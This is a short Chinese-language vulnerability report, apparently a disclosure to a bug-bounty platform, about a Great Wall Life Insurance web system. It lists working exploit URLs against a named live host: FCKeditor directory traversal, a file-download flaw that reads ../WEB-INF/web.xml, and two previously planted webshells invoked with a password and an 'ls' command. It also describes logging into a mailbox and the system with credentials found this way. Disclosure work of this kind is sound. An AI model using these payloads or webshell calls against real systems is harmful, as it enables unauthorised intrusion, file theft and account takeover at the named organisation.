长城人寿某系统漏洞打包（目录遍历/文件下载/前人shell）

目录遍历/文件下载/前人shell，我只是希望能把shell删干净，所以提一下

http://www.4008118228.cn/index.shtml

系统使用了fck编辑器

http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../

http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../Include/

在遍历目录的时候发现一个文件

http://www.4008118228.cn/common/LoadFile.jsp

访问的时候，会把绝对路径爆出来

简单构造就可以下载文件了

http://www.4008118228.cn/common/LoadFile.jsp?FileName=LoadFile.jsp

http://www.4008118228.cn/common/LoadFile.jsp?FileName=../WEB-INF/web.xml

同样的文件在此处还发现一个

http://www.4008118228.cn/Platform/LoadFile.jsp

一并改了吧

shell：

http://www.4008118228.cn/shell.jsp?pwd=023&i=ls /

这里还有一枚遗留，点出来一并删了吧

http://www.4008118228.cn/uddiexplorer/2ss.jsp?pwd=023&i=ls

使用找到的mail登录邮箱

通讯录

最后登录系统

解决方案：

过滤../